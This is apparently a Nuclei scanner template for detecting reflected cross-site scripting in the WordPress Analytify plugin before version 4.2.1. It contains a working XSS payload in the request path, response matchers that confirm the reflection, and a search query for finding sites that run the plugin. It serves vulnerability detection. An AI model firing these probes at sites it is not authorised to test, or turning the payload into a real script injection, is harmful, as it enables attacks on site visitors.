id: analytify-plugin-xss

info:
  name: Analytify <4.2.1 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:/wp-content/plugins/wp-analytify
  tags: wp,wordpress,analytify,wpscan,wp-plugin,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/aa404bb?a</script><script>alert(/XSS/)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'text/javascript">alert(/XSS/)</script>'
          - 'wp-analytify'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 404

# digest: 4b0a00483046022100e09cd2cb41d74201a55b08ad6c64761c1d0ddfc72a64f63eed0e6d886e298baf0221009e9e3ac9fbb67b006a5dca925a6426f863dc636facc5a7299b2e80d92b2edd0c:922c64590222798bb761d5b6d8e72950
